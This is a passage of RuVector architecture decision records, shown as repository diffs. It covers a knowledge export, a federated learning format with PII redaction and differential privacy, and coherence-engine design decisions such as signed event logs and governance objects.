- Component quantization (from `ruvector-attention::curvature::component_quantizer`) interacts poorly with curvature -- quantization errors in hyperbolic space are amplified by the metric near the boundary. Mitigation: use higher quantization precision for hyperbolic components
## Implementation
1. Create `crates/ruvector-graph-transformer/src/manifold/mod.rs` re-exporting all types
2. Implement `ProductManifoldAttention` in `manifold/product.rs`, bridging to `ruvector-attention::curvature::fused_attention` and `ruvector-attention::hyperbolic::lorentz_cascade`
3. Implement `CurvatureAdaptiveRouter` in `manifold/router.rs`, bridging to `ruvector-attention::curvature::tangent_space`
4. Implement `GeodesicMessagePassing` in `manifold/geodesic.rs`, using `ruvector-attention::hyperbolic::poincare` for exp/log/transport
5. Implement `RiemannianAdamOptimizer` in `manifold/optimizer.rs`, extending `ruvector-attention::training::optimizer`
6. Implement `LieGroupEquivariantAttention` in `manifold/lie_group.rs`, bridging to `ruvector-attention::sheaf::{SheafAttention, RestrictionMap}`
7. Add benchmark: `benches/manifold_bench.rs` measuring mixed-curvature attention throughput on a 50K-node hierarchical graph
8. Integration test: product manifold attention on a synthetic graph with known curvature, verify embedding distortion is lower than Euclidean baseline
9. Verify build: `cargo test --features manifold -p ruvector-graph-transformer`
## References
- ADR-046: Graph Transformer Unified Architecture (module structure, `manifold` feature flag, `mixed_curvature.rs` bridge)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, manifold containment invariants)
- ADR-049: Verified Training Pipeline (Riemannian optimization verification during training)
- ADR-051: Physics-Informed Graph Layers (gauge equivariance via sheaf, related to Lie group equivariance)
- Research: `docs/research/gnn-v2/27-hyperbolic-mixed-curvature-graph-transformers.md`
- `crates/ruvector-attention/src/hyperbolic/poincare.rs`: `mobius_add`, `mobius_scalar_mult`, `frechet_mean`, `exp_map`, `log_map`
- `crates/ruvector-attention/src/hyperbolic/lorentz_cascade.rs`: `LorentzCascadeAttention`, Busemann scoring, Einstein midpoint
- `crates/ruvector-attention/src/hyperbolic/mixed_curvature.rs`: `MixedCurvatureAttention`
- `crates/ruvector-attention/src/curvature/fused_attention.rs`: `MixedCurvatureFusedAttention`, `FusedCurvatureConfig`
- `crates/ruvector-attention/src/curvature/tangent_space.rs`: `TangentSpaceMapper`
- `crates/ruvector-attention/src/curvature/component_quantizer.rs`: mixed-curvature quantization
- `crates/ruvector-attention/src/sheaf/restriction.rs`: `RestrictionMap`
- `crates/ruvector-attention/src/sheaf/attention.rs`: `SheafAttention`
- `crates/ruvector-attention/src/transport/sliced_wasserstein.rs`: `SlicedWassersteinAttention`
- `crates/ruvector-attention/src/training/optimizer.rs`: base optimizer
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`
- Nickel & Kiela, "Poincare Embeddings for Learning Hierarchical Representations" (NeurIPS, 2017)
- Gu et al., "Learning Mixed-Curvature Representations in Product Spaces" (ICLR, 2019)
- Chami et al., "Hyperbolic Graph Convolutional Neural Networks" (NeurIPS, 2019)
- Becigneul & Ganea, "Riemannian Adaptive Optimization Methods" (ICLR, 2019)
- Fuchs et al., "SE(3)-Transformers: 3D Roto-Translation Equivariant Attention Networks" (NeurIPS, 2020)

View File

@@ -0,0 +1,81 @@
# ADR-056: RVF Knowledge Export for Developer Onboarding
**Status**: Accepted
**Date**: 2026-02-26
**Authors**: ruv.io, RuVector Architecture Team
**Deciders**: Architecture Review Board
**SDK**: Claude-Flow
## Context
### The Onboarding Problem
The RuVector project has accumulated 3,135 commits across 99 days (2025-11-19 to 2026-02-26), producing 91 crates, 55+ ADRs, and a sophisticated RVF format specification. New developers face a steep learning curve:
1. **No single entry point** — Knowledge is scattered across ADRs, commit messages, code comments, and claude-flow memory
2. **Implicit architecture** — Many design decisions live in commit history, not documentation
3. **Format complexity** — RVF has 25 segment types, 5 domain profiles, and integrations with 7+ libraries
4. **Computation depth** — 85+ crates covering GNN, graph transformers, solvers, LLM inference, quantum simulation, formal verification
### The RVF Opportunity
RVF (ADR-029) already defines a self-describing binary format with META_SEG for key-value metadata, WITNESS_SEG for audit trails, and the `rvf-adapter-claude-flow` crate for memory persistence. A knowledge export in RVF format serves as both:
1. **A practical onboarding artifact** — Everything a developer needs to understand RuVector
2. **A live demonstration** — The export itself exercises the RVF format, proving the format works
## Decision
### Export all accumulated project knowledge as an RVF-backed knowledge base
The export lives at `docs/research/knowledge-export/` and consists of:
1. **`ruvector-knowledge.rvf.json`** — Structured knowledge base in JSON (human-readable RVF manifest representation)
2. **`QUICKSTART.md`** — Developer onboarding guide distilled from the knowledge base
3. **This ADR** — Governance record for the export process
### Knowledge Segments
The export maps project knowledge to RVF segment types:
| RVF Segment | Knowledge Category | Content |
|-------------|-------------------|---------|
| META_SEG (0x07) | Project Identity | Name, version, license, repo, timeline, statistics |
| PROFILE_SEG (0x0B) | Architecture Profiles | Crate taxonomy, module purposes, feature flags |
| WITNESS_SEG (0x0A) | Decision History | All ADRs summarized with status and rationale |
| INDEX_SEG (0x02) | Dependency Graph | Inter-crate dependency map for navigation |
| OVERLAY_SEG (0x03) | Evolution Timeline | Major milestones and architectural shifts |
| SKETCH_SEG (0x09) | Patterns & Conventions | Coding patterns, testing strategy, CI/CD practices |
| JOURNAL_SEG (0x04) | Lessons Learned | Debugging insights, security findings, performance discoveries |
### Who Uses This
| Audience | Use Case |
|----------|----------|
| New developers | Read QUICKSTART.md, browse knowledge base for architecture overview |
| AI agents | Load knowledge base as context for code generation and review |
| Contributors | Understand design decisions before proposing changes |
| Downstream users | Evaluate RuVector capabilities and integration points |
## Consequences
### Benefits
1. **Single-file onboarding** — One JSON file contains the entire project knowledge graph
2. **RVF dogfooding** — Proves the format's metadata and witness capabilities
3. **AI-consumable** — Structured format that LLMs can parse and reason over
4. **Version-controlled** — Ships with the repo, stays synchronized
### Risks
| Risk | Mitigation |
|------|------------|
| Knowledge becomes stale | Export script can be re-run; ADR mandates updates at major versions |
| Export is too large | Structured by segment type; consumers can load specific sections |
| Sensitive data leaks | Export draws only from public repo content, never from .env or credentials |
## Related Decisions
- **ADR-029**: RVF canonical format (defines the segment model used here)
- **ADR-030**: Cognitive containers (export is a lightweight cognitive container)
- **ADR-031**: RVF example repository (this export serves as a living example)

View File

@@ -0,0 +1,265 @@
# ADR-057: Federated RVF Format for Real-Time Transfer Learning
**Status**: Proposed
**Date**: 2026-02-26
**Authors**: ruv.io, RuVector Architecture Team
**Deciders**: Architecture Review Board
**SDK**: Claude-Flow
**Supersedes**: None
**Related**: ADR-029 (RVF Canonical Format), ADR-030 (Cognitive Containers), ADR-056 (Knowledge Export)
## Context
### The Federation Problem
RuVector users independently develop modules and crates, each accumulating valuable learning patterns: SONA weight trajectories, policy kernel configurations, domain expansion priors, HNSW tuning parameters, and convergence data. Today, this learning is siloed. User A discovers that a specific LoRA rank and EWC lambda combination works well for code review tasks, but User B must rediscover this independently.
The existing infrastructure already supports local federated learning within a single deployment:
1. **SONA `FederatedCoordinator`** (`crates/sona/src/training/federated.rs`) aggregates `AgentExport` from `EphemeralAgent` instances, replaying trajectories above a quality threshold into a master engine. Supports `Star`, `Hierarchical`, and `PeerToPeer` topologies.
2. **Domain Expansion Engine** (`crates/ruvector-domain-expansion/`) implements cross-domain transfer via `MetaThompsonEngine` with `TransferPrior` (compact Beta posteriors), `PolicyKernel` (population-based policy search), and `CostCurve` (acceleration scoreboard). The `rvf_bridge` module already serializes these into RVF segments `0x30`, `0x31`, `0x32`.
3. **RVF Format** (`crates/rvf/`) provides 25 segment types with 64-byte headers, SHAKE-256 hashing, Ed25519 signing, WITNESS_SEG audit trails, and forward-compatible unknown-segment passthrough. Segments `TransferPrior (0x30)`, `PolicyKernel (0x31)`, and `CostCurve (0x32)` already exist.
4. **Google Cloud example** (`examples/google-cloud/`) demonstrates Cloud Run deployment with axum HTTP server, GPU benchmarking, and self-learning models.
What is missing is the **inter-user federation layer**: the ability to strip PII, package transferable learning as RVF segments, publish them to a shared registry, and merge incoming learning with differential privacy guarantees.
### Why Now
- The RVF segment model is stable with 25 types and a clear allocation map
- The `rvf_bridge` proves that `TransferPrior`/`PolicyKernel`/`CostCurve` round-trip cleanly through RVF segments
- SONA's `FederatedCoordinator` demonstrates that trajectory aggregation with quality gating works
- The Google Cloud example provides the deployment foundation
- Users are building domain-specific crates and would benefit from shared learning
### Design Principles
1. **Optional**: Core RuVector works without federation. All new crates are feature-gated.
2. **Privacy-First**: PII stripping happens before any data leaves the local system. Differential privacy noise is injected at the export boundary.
3. **RVF-Native**: Learning is exchanged as RVF segments, not custom wire formats. Unknown segments pass through unchanged.
4. **Cryptographically Verifiable**: Every export carries a WITNESS_SEG chain and Ed25519/ML-DSA-65 signatures.
5. **Incremental**: Users can share only what they choose. No all-or-nothing.
## Decision
### 1. New Segment Types
Add four new segment types to the `0x33-0x36` range in `rvf-types`:
| Code | Name | Purpose |
|------|------|---------|
| `0x33` | `FederatedManifest` | Describes a federated learning export: contributor pseudonym, export timestamp, included segment IDs, privacy budget spent, format version |
| `0x34` | `DiffPrivacyProof` | Differential privacy attestation: epsilon/delta values, noise mechanism used, sensitivity bounds, clipping parameters |
| `0x35` | `RedactionLog` | PII stripping attestation: which fields were redacted, which rules fired, hash of pre-redaction content (for audit without revealing content) |
| `0x36` | `AggregateWeights` | Federated-averaged SONA weights: aggregated LoRA deltas, participation count, round number, convergence metrics |
The existing `TransferPrior (0x30)`, `PolicyKernel (0x31)`, `CostCurve (0x32)`, `Witness (0x0A)`, `Crypto (0x0C)`, and `Meta (0x07)` segments are reused as-is.
### 2. New Crates
Nine new crates (seven within `crates/rvf/`, two interface crates):
| Crate | Path | no_std | Purpose |
|-------|------|--------|---------|
| `rvf-federation` | `crates/rvf/rvf-federation` | no (std-only) | Core federation protocol: export builder, import merger, version-aware conflict resolution, selective sharing |
| `rvf-pii-strip` | `crates/rvf/rvf-pii-strip` | core: yes, full: no | PII detection and stripping pipeline: regex patterns, path normalization, credential detection, configurable rules, REDACTION_LOG segment generation |
| `rvf-diff-privacy` | `crates/rvf/rvf-diff-privacy` | core: yes, full: no | Differential privacy primitives: Gaussian/Laplace mechanisms, privacy accountant (RDP), gradient clipping, per-parameter noise calibration |
| `rvf-gcloud` | `crates/rvf/rvf-gcloud` | no (std-only) | Google Cloud integration: Pub/Sub publisher/subscriber, GCS object store, Firestore metadata registry, Cloud IAM auth |
| `rvf-fed-aggregate` | `crates/rvf/rvf-fed-aggregate` | no (std-only) | Federated aggregation server: FedAvg, FedProx, weighted averaging, Byzantine-tolerant aggregation, round management |
| `rvf-fed-wasm` | `crates/rvf/rvf-fed-wasm` | no (wasm32) | WASM-compatible export path: browser-side PII stripping and export packaging |
| `mcp-federation` | `crates/mcp-federation` | no (std-only) | MCP server for AI agent access: 6 tools + 4 resources over JSON-RPC 2.0 stdio |
| `rvf-fed-server` | `crates/rvf/rvf-fed-server` | no (std-only) | REST API server (axum): export/import/aggregate endpoints, SSE events, Prometheus metrics |
| `rvf-adapters/federation` | `crates/rvf/rvf-adapters/federation` | no (std-only) | Adapter connecting SONA's `FederatedCoordinator` and domain expansion's `MetaThompsonEngine` to the federation protocol |
### 3. PII Stripping Pipeline
The `rvf-pii-strip` crate implements a three-stage pipeline:
**Stage 1: Detection** -- Scan all string fields in RVF segment payloads for PII patterns:
- File paths (`/home/user/...`, `C:\Users\...`)
- IP addresses (IPv4, IPv6, loopback)
- Email addresses
- API keys (common patterns: `sk-...`, `AKIA...`, `ghp_...`, Bearer tokens)
- Usernames and hostnames
- Environment variable references (`$HOME`, `%USERPROFILE%`)
- Custom regex rules from configuration
**Stage 2: Redaction** -- Replace detected PII with deterministic pseudonyms:
- Paths become `<PATH_N>` where N is a per-export incrementing counter
- IPs become `<IP_N>`
- Keys become `<REDACTED_KEY>`
- Usernames become `<USER_N>`
- Preserves structural relationships (same path always maps to same pseudonym within one export)
**Stage 3: Attestation** -- Generate a `RedactionLog (0x35)` segment containing:
- Count of each redaction type
- SHAKE-256 hash of the pre-redaction content (proves content was scanned without revealing it)
- Rules that fired
- Timestamp
### 4. Differential Privacy
The `rvf-diff-privacy` crate provides mathematical privacy guarantees:
- **Gradient Clipping**: Before aggregation, clip per-user gradient norms to bound sensitivity
- **Noise Injection**: Add calibrated Gaussian noise (for (epsilon, delta)-DP) to aggregated weights
- **Privacy Accountant**: Track cumulative privacy loss using Renyi Differential Privacy (RDP) composition
- **Per-Export Budget**: Each federated export consumes a portion of the user's privacy budget. The `DiffPrivacyProof (0x34)` segment records the spent budget.
- **Configurable Epsilon**: Users set their comfort level. Default: epsilon=1.0, delta=1e-5 (strong privacy)
### 5. Google Cloud Architecture
The `rvf-gcloud` crate integrates with Google Cloud Platform:
**Pub/Sub**: Real-time learning event propagation
- Topic: `ruvector-federation-events`
- Messages: serialized `FederatedManifest` headers (small, <1KB)
- Subscribers filter by domain, version, and contributor reputation
**Cloud Storage (GCS)**: RVF file exchange
- Bucket: `ruvector-federation-{region}`
- Object naming: `{domain}/{version}/{contributor_pseudonym}/{timestamp}.rvf`
- Lifecycle: auto-archive after 90 days, delete after 365 days
- Server-side encryption with CMEK
**Firestore**: Metadata registry
- Collection: `federation_manifests`
- Documents: manifest metadata, contributor reputation scores, merge history
- Real-time listeners for new contribution notifications
**Cloud Run**: Aggregation service
- Extends the existing `examples/google-cloud/` server
- New endpoints: `POST /federation/submit`, `GET /federation/pull`, `POST /federation/aggregate`
- Rate limiting: 100 submissions/hour per contributor
- IAM-based access control
### 6. Transfer Learning Protocol
**Export Flow**:
1. User triggers export (CLI: `rvf federation export --domain <id> --epsilon 1.0`)
2. `rvf-adapters/federation` extracts `TransferPrior`, `PolicyKernel`, `CostCurve`, and SONA weights from local engines
3. `rvf-pii-strip` scans and redacts all payloads, generating `RedactionLog` segment
4. `rvf-diff-privacy` adds calibrated noise to numerical parameters, generating `DiffPrivacyProof` segment
5. `rvf-federation` assembles the export: `FederatedManifest` + learning segments + `RedactionLog` + `DiffPrivacyProof` + `Witness` chain + `Crypto` signature
6. `rvf-gcloud` uploads to GCS and publishes notification to Pub/Sub
**Import Flow**:
1. User subscribes to federation updates (CLI: `rvf federation subscribe --domains <ids>`)
2. `rvf-gcloud` receives Pub/Sub notification, downloads RVF file from GCS
3. `rvf-federation` validates: signature check, witness chain verification, privacy proof verification, version compatibility check
4. `rvf-federation` merges: version-aware prior dampening (same sqrt-scaling as `MetaThompsonEngine::init_domain_with_transfer`), conflict resolution for competing patterns
5. `rvf-adapters/federation` imports merged learning into local SONA and domain expansion engines
**Federated Averaging**:
1. Aggregation server collects N exports for a given domain/version
2. `rvf-fed-aggregate` computes weighted average (weight = contributor reputation * trajectory count * quality score)
3. Byzantine tolerance: exclude outliers beyond 2 standard deviations from the mean
4. Generate aggregate `AggregateWeights (0x36)` segment
5. Publish aggregate back to GCS for all subscribers
### 7. Version-Aware Merging
Learning from different RVF versions must be handled:
- **Same version**: Direct merge using federated averaging
- **Newer to older**: Newer learning carries a version tag; older clients skip segments they cannot parse (RVF forward compatibility)
- **Older to newer**: Accepted with dampened confidence (lower weight in averaging)
- **Conflict resolution**: When two priors disagree on a bucket/arm, merge using `BetaParams::merge()` (sum parameters minus uniform prior)
### 8. MCP Server Interface
A dedicated `mcp-federation` crate provides AI agent access to federation through MCP (JSON-RPC 2.0 over stdio), following the same pattern as the existing `mcp-gate` crate:
| Tool | Purpose |
|------|---------|
| `federation_export` | Extract learning, strip PII, apply DP noise, sign, and upload |
| `federation_import` | Pull, validate, and merge federated learning into local engines |
| `federation_status` | Read privacy budget, recent activity, contributor reputation |
| `federation_search` | Query the registry for available learning by domain/quality |
| `federation_budget` | Check remaining privacy budget and export history |
| `federation_aggregate` | Trigger server-side aggregation round |
Resources (read-only): `federation://domains`, `federation://contributors`, `federation://rounds/{id}`, `federation://budget`
Registration: `claude mcp add mcp-federation -- cargo run -p mcp-federation`
### 9. REST API Interface
The `rvf-fed-server` crate provides a REST API (axum-based, deployed on Cloud Run) for programmatic access:
- **Export/Import**: `POST /v1/exports`, `GET /v1/exports/{id}`, `DELETE /v1/exports/{id}`
- **Aggregation**: `POST /v1/aggregates`, `GET /v1/aggregates/{round_id}`, `GET /v1/aggregates/latest`
- **Registry**: `GET /v1/domains`, `GET /v1/contributors/{pseudonym}`, `GET /v1/contributors/{pseudonym}/budget`
- **Events**: `GET /v1/events?domain=X` (Server-Sent Events for real-time notifications)
- **Health**: `GET /v1/health`, `GET /v1/metrics` (Prometheus)
Authentication: API key (Bearer token) or Ed25519 signed requests. Rate-limited per contributor.
SDKs: Rust (`rvf_federation::client::FederationClient`) and TypeScript (`@ruvector/rvf-federation`).
### 10. Selective Sharing
Users control what they share via a `FederationPolicy`:
- **Allowlist/Denylist**: Specific segment types or domains to include/exclude
- **Quality Gate**: Only export learning from trajectories above a quality threshold (reuses SONA's `quality_threshold`)
- **Minimum Evidence**: Only export priors with sufficient observations (reuses `TransferPrior::extract_summary()`'s >12 observation filter)
- **Rate Limit**: Maximum exports per time period
- **Privacy Budget**: Cumulative epsilon limit before exports are blocked
## Consequences
### Benefits
1. **Knowledge acceleration**: New users bootstrap from community learning instead of starting cold
2. **Privacy-preserving**: PII stripping + differential privacy ensure no sensitive data leaks
3. **RVF-native**: No new wire formats; everything is standard RVF segments
4. **Cryptographically auditable**: Witness chains prove provenance without revealing content
5. **Incremental adoption**: Feature-gated, optional, selective sharing
6. **Cloud-native**: Google Cloud Pub/Sub + GCS + Firestore provide scalable infrastructure
7. **WASM-compatible**: Browser-based exports via `rvf-fed-wasm`
8. **MCP-integrated**: AI agents access federation through standard MCP tools (JSON-RPC 2.0)
9. **API-first**: REST API with SSE events for programmatic access, Rust and TypeScript SDKs
### Risks
| Risk | Severity | Mitigation |
|------|----------|------------|
| Poisoning attacks (malicious learning) | High | Byzantine-tolerant aggregation, reputation system, signature verification |
| Privacy budget exhaustion | Medium | Configurable epsilon, budget tracking per-export, admin alerts at 80% budget |
| Version skew causing merge failures | Medium | RVF forward compatibility, version-tagged manifests, graceful skip of unknown segments |
| GCS cost escalation | Low | Lifecycle policies, per-contributor quotas, compression (ZSTD segment compression) |
| Latency of federated averaging | Low | Async aggregation, Pub/Sub decoupling, local-first operation |
| Regulatory compliance (GDPR, CCPA) | High | PII stripping attestation, data retention policies, right-to-deletion via contributor pseudonym revocation |
### Segment Allocation Map (Updated)
```
0x00 Invalid
0x01-0x0F Core segments (Vec, Index, Overlay, Journal, Manifest, Quant, Meta, Hot, Sketch, Witness, Profile, Crypto, MetaIdx, Kernel, Ebpf)
0x10-0x11 Extension segments (Wasm, Dashboard)
0x12-0x1F RESERVED (12 slots available)
0x20-0x23 Storage segments (CowMap, Refcount, Membership, Delta)
0x24-0x2F RESERVED (12 slots available)
0x30-0x32 Domain expansion (TransferPrior, PolicyKernel, CostCurve)
0x33-0x36 Federation (FederatedManifest, DiffPrivacyProof, RedactionLog, AggregateWeights) <-- NEW
0x37-0xEF RESERVED (future use)
0xF0-0xFF RESERVED (system)
```
## Compliance
- **GDPR Article 25**: Privacy by design -- PII stripping is mandatory before export, not optional
- **GDPR Article 17**: Right to erasure -- contributor pseudonym revocation removes all associated exports from GCS
- **CCPA Section 1798.105**: Deletion requests honored via pseudonym revocation
- **NIST SP 800-188**: De-identification via differential privacy with formal epsilon guarantees
## References
- McMahan et al., "Communication-Efficient Learning of Deep Networks from Decentralized Data" (FedAvg)
- Abadi et al., "Deep Learning with Differential Privacy" (DP-SGD)
- Mironov, "Renyi Differential Privacy" (RDP composition)
- Blanchard et al., "Machine Learning with Adversaries: Byzantine Tolerant Gradient Descent" (Byzantine tolerance)
- RVF Format Specification (ADR-029)
- SONA Architecture (crates/sona)
- Domain Expansion Engine (crates/ruvector-domain-expansion)

View File

@@ -0,0 +1,37 @@
# ADR-CE-001: Sheaf Laplacian Defines Coherence Witness
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Traditional AI systems use probabilistic confidence scores to gate decisions. These scores:
- Can be confidently wrong (hallucination)
- Don't provide structural guarantees
- Are not provable or auditable
## Decision
**Sheaf Laplacian defines coherence witness, not probabilistic confidence.**
The coherence energy E(S) = Σ w_e|r_e|² provides a mathematical measure of structural consistency where:
- r_e = ρ_u(x_u) - ρ_v(x_v) is the edge residual
- w_e is the edge weight
- Zero energy means perfect global consistency
## Consequences
### Benefits
- Mathematical proof of consistency, not statistical guess
- Every decision has computable witness
- Residuals pinpoint exact inconsistency locations
### Risks
- Restriction map design requires domain expertise
- Initial setup more complex than confidence thresholds
## References
- Hansen & Ghrist (2019), "Toward a spectral theory of cellular sheaves"
- ADR-014: Coherence Engine Architecture

View File

@@ -0,0 +1,38 @@
# ADR-CE-002: Incremental Coherence Computation
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Recomputing global coherence energy for every update is O(|E|) where |E| is edge count. For large graphs with frequent updates, this is prohibitive.
## Decision
**Incremental computation with stored residuals, subgraph summaries, and global fingerprints.**
Components:
1. **Stored residuals**: Cache per-edge residuals, update only affected edges
2. **Subgraph summaries**: Pre-aggregate energy by scope/namespace
3. **Global fingerprints**: Hash-based staleness detection
When node v changes:
1. Find edges incident to v: O(degree(v))
2. Recompute only those residuals: O(degree(v) × d)
3. Update affected subgraph summaries: O(log n)
## Consequences
### Benefits
- Single node update: O(degree × d) instead of O(|E| × d)
- Fingerprints enable efficient cache invalidation
- Subgraph summaries support scoped queries
### Risks
- Memory overhead for cached residuals
- Consistency between cache and graph requires careful management
## References
- ADR-014: Coherence Engine Architecture, Section 2

View File

@@ -0,0 +1,37 @@
# ADR-CE-003: PostgreSQL + Ruvector Unified Substrate
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
The coherence engine requires:
- Transactional authority for governance data (policies, witnesses, lineage)
- High-performance vector/graph operations for coherence computation
- Audit trail with deterministic replay
## Decision
**PostgreSQL + ruvector as unified substrate.**
| Layer | Storage | Purpose |
|-------|---------|---------|
| Governance | PostgreSQL | Policy bundles, witnesses, lineage (ACID) |
| Coherence | ruvector | Node states, edges, HNSW index, residuals |
| Audit | PostgreSQL | Event log with signatures |
## Consequences
### Benefits
- PostgreSQL: Battle-tested ACID for governance
- ruvector: Optimized for vector similarity and graph traversal
- Clear separation of concerns
### Risks
- Two systems to maintain
- Cross-system consistency requires careful transaction handling
## References
- ADR-014: Coherence Engine Architecture, Section 13

View File

@@ -0,0 +1,42 @@
# ADR-CE-004: Signed Event Log with Deterministic Replay
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
For audit, debugging, and compliance, the system must support:
- Complete reconstruction of any past state
- Verification that events were not tampered with
- Replay for testing and analysis
## Decision
**Signed event log with deterministic replay.**
Every event is:
1. Assigned a monotonic sequence ID
2. Serialized with timestamp and payload
3. Signed with Blake3 hash including previous event's signature (chain)
4. Stored append-only in PostgreSQL
Replay:
- Start from genesis or checkpoint
- Apply events in sequence order
- Deterministic: same events → same state
## Consequences
### Benefits
- Tamper-evident: any modification breaks the hash chain
- Complete auditability: reconstruct any historical state
- Debugging: replay and inspect at any point
### Risks
- Storage grows indefinitely (mitigated by checkpoints)
- Replay time scales with history length
## References
- ADR-014: Coherence Engine Architecture, Section 13

View File

@@ -0,0 +1,49 @@
# ADR-CE-005: First-Class Governance Objects
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Governance decisions (thresholds, policies, approvals) must be:
- Versioned and traceable
- Signed by authorized parties
- Immutable once approved
- Addressable for reference in witnesses
## Decision
**Governance objects are first-class, immutable, addressable.**
Three governance object types:
1. **PolicyBundle**: Versioned threshold configurations
- Signed by required approvers
- Content-addressed (ID = hash of contents)
- Immutable once created
2. **WitnessRecord**: Proof of gate decisions
- Links to PolicyBundle used
- Chains to previous witness (hash chain)
- Content-addressed
3. **LineageRecord**: Provenance of writes
- Links to authorizing witness
- Tracks causal dependencies
- Enables "why did this change?" queries
## Consequences
### Benefits
- Complete audit trail for compliance
- Multi-party approval for sensitive changes
- Content addressing prevents substitution attacks
### Risks
- Cannot modify bad policies (must create new version)
- Storage overhead for immutable objects
## References
- ADR-014: Coherence Engine Architecture, Section 4

View File

@@ -0,0 +1,37 @@
# ADR-CE-006: Coherence Gate Controls Compute Ladder
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Not all coherence violations require the same response. A minor transient spike differs from sustained structural breakdown. The system needs graduated responses.
## Decision
**Coherence gate controls explicit compute ladder: Reflex → Retrieval → Heavy → Human.**
| Lane | Latency | Trigger | Action |
|------|---------|---------|--------|
| 0: Reflex | <1ms | E < θ_reflex | Proceed, local update |
| 1: Retrieval | ~10ms | θ_reflex ≤ E < θ_retrieval | Fetch evidence, lightweight reasoning |
| 2: Heavy | ~100ms | θ_retrieval ≤ E < θ_heavy | Multi-step planning, spectral analysis |
| 3: Human | Async | E ≥ θ_heavy or persistent | Escalate to human, block action |
## Consequences
### Benefits
- Most operations stay fast (Lane 0)
- Graduated response matches severity
- Human escalation for truly difficult cases
- Every escalation has witness
### Risks
- Threshold tuning requires domain knowledge
- Over-sensitive thresholds cause unnecessary escalation
## References
- ADR-014: Coherence Engine Architecture, Section 3
- ADR-CE-014: Reflex Lane Default

View File

@@ -0,0 +1,46 @@
# ADR-CE-007: Thresholds Auto-Tuned from Production Traces
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Fixed thresholds become stale as:
- System behavior evolves
- New edge types are added
- Domain characteristics change
Manual tuning is expensive and error-prone.
## Decision
**Thresholds auto-tuned from production traces with governance approval.**
Process:
1. **Collect traces**: Energy values, gate decisions, outcomes
2. **Analyze**: SONA identifies optimal threshold candidates
3. **Propose**: System generates new PolicyBundle with updated thresholds
4. **Approve**: Required approvers sign the bundle
5. **Deploy**: New thresholds become active
Constraints:
- Auto-tuning proposes, humans approve
- Changes tracked in audit log
- Rollback supported via new PolicyBundle
## Consequences
### Benefits
- Thresholds adapt to changing conditions
- Governance maintained (human approval required)
- Historical analysis enables data-driven decisions
### Risks
- Bad traces lead to bad proposals
- Approval bottleneck if too many proposals
## References
- ADR-014: Coherence Engine Architecture, Section 6
- ADR-CE-015: Adapt Without Losing Control

View File

@@ -0,0 +1,38 @@
# ADR-CE-008: Multi-Tenant Isolation
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Enterprise deployments require multiple tenants sharing infrastructure while maintaining:
- Data isolation (tenant A cannot see tenant B's data)
- Policy isolation (different thresholds per tenant)
- Execution isolation (one tenant's load doesn't affect another)
## Decision
**Multi-tenant isolation at data, policy, and execution boundaries.**
| Boundary | Mechanism |
|----------|-----------|
| Data | Tenant ID on all rows, row-level security |
| Policy | PolicyBundle scoped to tenant |
| Execution | Tile assignment, rate limiting |
| Graph | Subgraph partitioning by tenant |
## Consequences
### Benefits
- Single deployment serves multiple tenants
- Clear isolation boundaries
- Per-tenant customization
### Risks
- Noisy neighbor problems (mitigated by rate limiting)
- Complexity in cross-tenant operations (by design: not allowed)
## References
- ADR-014: Coherence Engine Architecture

View File

@@ -0,0 +1,44 @@
# ADR-CE-009: Single Coherence Object
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
Building domain-specific coherence systems (one for AI, one for finance, one for medical) leads to:
- Duplicated effort
- Inconsistent semantics
- Maintenance burden
## Decision
**Single coherence object - once math is fixed, everything is interpretation.**
The Universal Coherence Object:
- Nodes: d-dimensional state vectors
- Edges: Restriction maps ρ_u, ρ_v
- Energy: E(S) = Σ w_e|r_e|²
- Gate: E < θ → allow
Domain-specific interpretation:
| Domain | Nodes | Edges | Residual | Gate |
|--------|-------|-------|----------|------|
| AI | Beliefs | Citations | Contradiction | Refusal |
| Finance | Trades | Arbitrage | Regime mismatch | Throttle |
| Medical | Vitals | Physiology | Clinical disagreement | Escalation |
## Consequences
### Benefits
- One implementation, many applications
- Proven math applies everywhere
- Domain experts focus on interpretation, not implementation
### Risks
- Abstraction may not fit all domains perfectly
- Requires mapping domain concepts to universal structure
## References
- ADR-014: Coherence Engine Architecture, "Universal Coherence Object"

View File

@@ -0,0 +1,56 @@
# ADR-CE-010: Domain-Agnostic Nodes and Edges
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
To support multiple domains with a single substrate, the node and edge types must be generic enough to represent:
- AI agent beliefs and citations
- Financial trades and market dependencies
- Medical vitals and physiological relationships
- Security identities and policy rules
## Decision
**Domain-agnostic nodes/edges - facts, trades, vitals, hypotheses all use same substrate.**
Node structure:
```rust
pub struct SheafNode {
pub id: NodeId,
pub state: Vec<f32>, // Fixed-dimension embedding
pub metadata: Metadata, // Domain-specific tags
pub updated_at: Timestamp,
}
```
Edge structure:
```rust
pub struct SheafEdge {
pub source: NodeId,
pub target: NodeId,
pub weight: f32,
pub rho_source: RestrictionMap,
pub rho_target: RestrictionMap,
}
```
Domain mapping happens in metadata and restriction map design.
## Consequences
### Benefits
- Single codebase for all domains
- Type safety through metadata validation
- Restriction maps encode domain semantics
### Risks
- Embedding dimension must be chosen carefully
- Metadata schema needs governance
## References
- ADR-014: Coherence Engine Architecture, Section 1
- ADR-CE-009: Single Coherence Object

View File

@@ -0,0 +1,38 @@
# ADR-CE-011: Residual = Contradiction Energy
**Status**: Accepted
**Date**: 2026-01-22
**Parent**: ADR-014 Coherence Engine Architecture
## Context
The edge residual r_e = ρ_u(x_u) - ρ_v(x_v) measures local mismatch. This mathematical quantity needs a universal interpretation across domains.
## Decision
**Residual = contradiction energy - universal interpretation across domains.**
The residual represents:
